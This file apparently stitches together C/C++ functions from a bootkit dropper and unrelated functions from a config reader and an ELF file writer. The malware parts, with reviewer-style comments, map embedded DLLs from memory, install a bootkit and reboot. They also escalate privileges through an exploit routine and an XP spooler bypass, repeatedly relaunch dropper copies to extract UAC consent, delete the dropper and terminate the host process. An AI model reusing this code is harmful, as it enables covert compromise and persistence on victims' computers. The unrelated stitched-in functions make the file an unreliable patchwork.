// Maps the DLL stored in this image's "BKDROPER_PLUG" section from memory,
// resolves its "BkInstall" export, calls it, and reboots when it reports
// success. Every failed step leaves through PP_RETURNIF1 (expansion not
// visible here; presumably an early return). The memory module is never
// unloaded on either path, and the return value of MultiMethodReboot() is
// ignored.
void RunBkDrop()
{
	DWORD  loader_dll_body_size = 0;
	void * loader_dll_body = NULL;

	PP_DPRINTF(L"RunBkDrop: started.");
	
	// Locate the embedded payload by section name; both a non-NULL pointer
	// and a non-zero size are required before anything is mapped.
	loader_dll_body = GetSectionData("BKDROPER_PLUG", &loader_dll_body_size);
	PP_RETURNIF1(loader_dll_body == NULL);
	PP_RETURNIF1(loader_dll_body_size == 0);

	// Debug-only trace; %X with a pointer argument is only correct on 32-bit.
	PP_DPRINTF(L"RunBkDrop: GetSectionData() result body=%X. size=%d", loader_dll_body,
		loader_dll_body_size );

	// The DLL is mapped from the section buffer (MemoryLoadLibrary) rather than
	// loaded from a file. NOTE(review): such a module is presumably not
	// registered with the OS loader, so memory-image inspection rather than
	// file or module-list checks is what would observe it — confirm against
	// the MemoryLoadLibrary implementation. Note that the size obtained above
	// is not passed to the loader, so the mapping is unbounded by it.
	HMEMORYMODULE loader_dll = MemoryLoadLibrary(loader_dll_body);

	PP_RETURNIF1(loader_dll == NULL);

	// Export signature assumed by the caller: BOOL WINAPI BkInstall(void).
	typedef BOOL (WINAPI * BkInstallFunction)();

	BkInstallFunction bkinstall = NULL;

	bkinstall = (BkInstallFunction)MemoryGetProcAddress(loader_dll, "BkInstall");

	PP_RETURNIF1(bkinstall == NULL);

	BOOL bkinstall_result = bkinstall();

	PP_DPRINTF(L"RunBkDrop: finished with bkinstall_result=%d.", bkinstall_result);

	// A TRUE result triggers a reboot attempt; FALSE is silently dropped.
	if (bkinstall_result) MultiMethodReboot();
}
BOOL CConfigData::bGetData(void*& lpData, int& nStreamLength, std::string strSectionName)
{
    // Reads section `strSectionName` of the current project and hands the
    // caller a newly allocated copy of its BLOB through `lpData`, with the
    // byte count in `nStreamLength`. Ownership of the buffer passes to the
    // caller, who must release it with delete[]. Returns FALSE when the
    // section cannot be read; the output parameters are then left untouched.
    SECTIONDATA secData;
    secData.m_omSectionName = strSectionName;

    if (GetSectionData(m_strCurrProjName, secData.m_omSectionName, secData) == FALSE)
    {
        return FALSE;
    }

    BYTE* pbCopy = new BYTE[secData.m_nBLOBLen];
    // Defensive check only: a throwing array-new never yields nullptr, so
    // allocation failure surfaces as std::bad_alloc rather than this branch.
    if (pbCopy == nullptr)
    {
        return FALSE;
    }

    memcpy(pbCopy, secData.m_bBLOB, secData.m_nBLOBLen);
    nStreamLength = secData.m_nBLOBLen;
    lpData = static_cast<void*>(pbCopy);
    return TRUE;
}
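bool CELFFile::WriteSectionData(int section_index,size_t offset,unsigned char * buffer,unsigned long* buffer_size)
{
    // Copies *buffer_size bytes from `buffer` into the in-memory data of
    // section `section_index`, starting `offset` bytes into the section.
    // Returns true only when the whole write fits inside the section; on any
    // failure nothing is written. `buffer_size` is read, never updated.
    bool success = false;
    // Initialised so the size is defined even if GetSectionData() does not
    // set it on failure.
    size_t section_size = 0;
    char * section_buffer = reinterpret_cast<char*>(GetSectionData(section_index,&section_size));

    if (section_buffer != NULL && buffer != NULL && buffer_size != NULL)
    {
        const size_t write_size = *buffer_size;
        // Bounds check expressed without `offset + write_size`: that sum can
        // wrap around for a large offset and pass the comparison, turning a
        // rejected write into an out-of-bounds memcpy.
        if (offset <= section_size && write_size <= section_size - offset)
        {
            memcpy(section_buffer + offset, buffer, write_size);
            success = true;
        }
    }
    return success;
}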
// Maps the DLL stored in this image's "LOADER_DLL" section from memory,
// resolves its "LoadPlugToCache" export and calls it with argument 0.
// Progress is reported through DebugReportStepByName() step ids 120_d,
// 121_d and 122_d. Each failed step leaves through PP_RETURNIF1 (expansion
// not visible here); the memory module is never unloaded and the result of
// the call is only logged.
void DownloadPlugByLoaderDll()
{
	DWORD  loader_dll_body_size = 0;
	void * loader_dll_body = NULL;

	PP_DPRINTF(L"DownloadPlugByLoaderDll: started.");
	
	// 120_d: loading Loader_dll
	PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("120_d"));

	// Locate the embedded DLL by section name; pointer and size must both be
	// non-zero before anything is mapped.
	loader_dll_body = GetSectionData("LOADER_DLL", &loader_dll_body_size);
	PP_RETURNIF1(loader_dll_body == NULL);
	PP_RETURNIF1(loader_dll_body_size == 0);

	// Mapped from the section buffer, not loaded from a file; the size
	// obtained above is not passed to the loader.
	HMEMORYMODULE loader_dll = MemoryLoadLibrary(loader_dll_body);

	PP_RETURNIF1(loader_dll == NULL);

	// 121_d: Loader_dll loaded successfully
	PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("121_d"));

	// Export signature assumed by the caller: BOOL WINAPI LoadPlugToCache(DWORD).
	typedef BOOL (WINAPI* LoadPlugToCacheFunction)(DWORD);

	LoadPlugToCacheFunction load_plug_to_cache = NULL;

	load_plug_to_cache = (LoadPlugToCacheFunction)MemoryGetProcAddress(loader_dll, "LoadPlugToCache");

	PP_RETURNIF1(load_plug_to_cache == NULL);

	// 122_d: about to call LoadPlugin
	PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("122_d"));

	// The meaning of the 0 argument is defined by the DLL, not visible here.
	BOOL load_plug_result = load_plug_to_cache(0);

	PP_DPRINTF(L"DownloadPlugByLoaderDll: finished with load_plug_result=%d.", load_plug_result);
}
// Routine run once this code is executing inside another process (original
// note: "function called when injected into other processes; checks its own
// privileges and tries to extend them").
//
// Control flow as written below:
//   1. UnhookDlls() and BuildImport() prepare the injected image; if
//      IsUserAdmin() is false, TakePrivileges() is called and results 0 and 2
//      stop the run.
//   2. ExplorerMain() is attempted; if it fails and TakePrivileges() has not
//      been used yet, TakePrivileges() is called and ExplorerMain() retried.
//   3. On OS major version 5 (Windows 2000/XP/2003 family), and only when this
//      image is not itself a DLL, the "DROPER_DLL" section is written to a
//      temp file whose path is passed to SpoolerBypass().
//   4. If the install still failed, FileToDelete is copied to a temp file
//      named "<DROPER_NAME_PREFIX><tmpname>.exe" with a sidecar ".manifest",
//      and launched through ShellExecuteExA up to 10 times per copy; the
//      whole step repeats until PathBkFile exists on disk — there is no other
//      exit from that loop.
//   5. A third ExplorerMain() attempt, then a DeleteDropper thread is started
//      and, when dwExplorerSelf is set, the host process is terminated.
//
// Host-observable artifacts for defenders: the temp files from steps 3 and
// 4, repeated elevation prompts, and the PathBkFile marker that ends the loop.
// Always returns 0; `lpData` is unused.
DWORD WINAPI ExplorerRoutine( LPVOID lpData )
{
	// 
	//	Deletion runs on a separate thread (see the end of this routine) because
	//	removing the dropper can take more than a minute.
	//
	
	BOOL bRun = TRUE;              // cleared when TakePrivileges() returns 0 or 2
	BOOL bRet = FALSE;             // result of the most recent ExplorerMain()
	BOOL IsUsedExploit = FALSE;    // TakePrivileges() has already been called
	OSVERSIONINFOEXA OSVer = {sizeof(OSVer), 0};  // size field set for pGetVersionExA

	UnhookDlls();

	BuildImport((PVOID)GetImageBase());

	PP_DPRINTF(L"ExplorerRoutine: started");

	if (! IsUserAdmin() )
	{
		PP_DPRINTF(L"ExplorerRoutine: user is not admin. Trying to take privileges.");
		// Only results 0 and 2 are treated as failure; any other value lets
		// the run continue.
		switch ( TakePrivileges() )
		{
			case 0:
			case 2:
				bRun = FALSE;
			break;	
		};

		PP_DPRINTF(L"ExplorerRoutine: TakePrivile result=%d", bRun);
		IsUsedExploit = TRUE; // in theory this is always TRUE at this point
	};		

	if ( bRun )
	{
		PP_DPRINTF(L"ExplorerRoutine: run ExplorerMain");
		bRet = ExplorerMain();
		PP_DPRINTF(L"ExplorerRoutine: ExplorerMain() result=%d", bRet);
	}
	
	/*		Admin path only: if TakePrivileges() was not used and the install failed,
			call it now and run the install again		*/
	if ( (bRet == FALSE) && (bRun == TRUE) && (IsUsedExploit == FALSE) )
	{
		PP_DPRINTF(L"ExplorerRoutine: Trying again to take privileges");

		IsUsedExploit = TRUE;
		switch ( TakePrivileges() )
		{
			case 0:
			case 2:
				bRun = FALSE;
			break;
		};
		if ( bRun )
		{
			PP_DPRINTF(L"ExplorerRoutine: Second call of ExplorerMain");
			bRet = ExplorerMain();
			PP_DPRINTF(L"ExplorerRoutine: Second ExplorerMain() result=%d", bRet);
		}
	};

	pGetVersionExA(&OSVer);

	
	/*		Write the DLL to disk and use the spooler bypass; OS major version 5 only
			(and only when this image is an EXE, not a DLL)		*/
	if ( (! bRet) && (PEFile::IsDll((PVOID)GetImageBase()) == FALSE) && (OSVer.dwMajorVersion == 5))
	{
		PP_DPRINTF(L"ExplorerRoutine: Trying to use XP spooler exploit");

		DWORD DropSize = 0;	
		PVOID DropImage  = GetSectionData("DROPER_DLL",&DropSize);
		if ( DropImage && DropSize)
		{
			// Temp file on disk — a host-visible artifact; the write result
			// is not checked before the path is used.
			PCHAR DropFile = File::GetTempNameA();
			File::WriteBufferA(DropFile,DropImage,DropSize);
			SpoolerBypass(DropFile);
			STR::Free(DropFile);
		};
	};


	/*		Launch copies of the dropper repeatedly, each one requesting elevation.		*/
	if (  bRet == FALSE )
	{
		PP_DPRINTF(L"ExplorerRoutine: start UAC asking cycle");

		PCHAR tmpexe,dir,file ;
		PCHAR tmp_manifest;
		PCHAR NamePrefix = GetSectionAnsiString("DROPER_NAME_PREFIX");
		
		// Outer loop: one new temp copy per iteration until PathBkFile exists.
		if ( NamePrefix )
		do 
		{

			tmpexe = File::GetTempNameA();
			tmp_manifest = STR::Alloc(MAX_PATH+1);
			
			dir = (tmpexe != NULL)? File::ExtractFilePath(tmpexe) : NULL ;
			file = (tmpexe != NULL)? File::ExtractFileName(tmpexe) : NULL ;
		
			if (  tmp_manifest && dir && file)
			{
				// Final name: <dir>\<NamePrefix><tmpname>.exe, manifest alongside.
				STR::Free(tmpexe);
				tmpexe = STR::New(5,dir,"\\",NamePrefix,file,".exe");
				// Early exit here leaves NamePrefix, tmp_manifest, dir and file
				// allocated.
				if ( ! tmpexe )
					return 0;
				m_lstrcpy(tmp_manifest,tmpexe);
				m_lstrcat(tmp_manifest,".manifest");
			};

			if ( tmpexe && tmp_manifest )
			if ( pCopyFileA(FileToDelete,tmpexe,FALSE) && SaveManifest(tmp_manifest) )
			{
				
				DWORD dwCode = -1;
				// Only cbSize, lpFile, lpParameters and fMask are set; the
				// remaining fields are left uninitialised.
				SHELLEXECUTEINFOA ExecInfo;
				
				// tmp_manifest is reused as the command line: "<exe>   <ARGV_UAC_RUN>".
				m_lstrcpy(tmp_manifest,tmpexe);
				m_lstrcat(tmp_manifest,"   ");
				m_lstrcat(tmp_manifest,ARGV_UAC_RUN);

				ExecInfo.cbSize = sizeof(ExecInfo);
				ExecInfo.lpFile = tmpexe;
				ExecInfo.lpParameters = tmp_manifest;
				ExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS;

				// Up to 10 launches of this copy; stops on a launch failure or
				// when the child exits with code 0. The child handle is not closed.
				for ( int i = 0; i < 10; ++i )
				{
					PP_DPRINTF(L"ExplorerRoutine: asking UAC for '%S'", tmp_manifest);

					if ( pShellExecuteExA(&ExecInfo) == FALSE )
						break;

					pWaitForSingleObject(ExecInfo.hProcess,INFINITE);
					pGetExitCodeProcess(ExecInfo.hProcess,&dwCode);
					if ( dwCode == 0  )
					{
						PP_DPRINTF(L"ExplorerRoutine: UAC allowed for '%S'", tmp_manifest);
						break;
					}
				}
			};
			
			// The temp copy itself is not removed here.
			if ( tmpexe )
				STR::Free(tmpexe);
			if ( tmp_manifest )
				STR::Free(tmp_manifest);
			if ( dir )
				STR::Free(dir);
			if ( file )
				STR::Free(file);
		}
		while ( ( (DWORD)pGetFileAttributesA(PathBkFile) == INVALID_FILE_ATTRIBUTES) );	//	end do: loop until the bootkit file appears

		if ( NamePrefix )
			STR::Free(NamePrefix);
	};

	/*		If the install was unsuccessful, try once more in case it succeeds now	*/
	if ( bRet  == FALSE)
	{
		PP_DPRINTF(L"ExplorerRoutine: Third call of ExplorerMain");
		bRet = ExplorerMain();
		PP_DPRINTF(L"ExplorerRoutine: Third ExplorerMain() result=%d", bRet);
	}

	/*	 Delete the dropper (on its own thread; the thread handle is closed at once)	*/
	PP_DPRINTF(L"ExplorerRoutine: Start to delete droper");
	pCloseHandle(StartThread(DeleteDropper,NULL));
	
	// dwExplorerSelf is a global defined elsewhere; when set, the hosting
	// process is terminated instead of returning to the caller.
	if ( dwExplorerSelf )
	{
		PP_DPRINTF(L"ExplorerRoutine: dwExplorerSelf is true. Call ExitProcess()");
		pExitProcess(0);
	}

	return 0;
}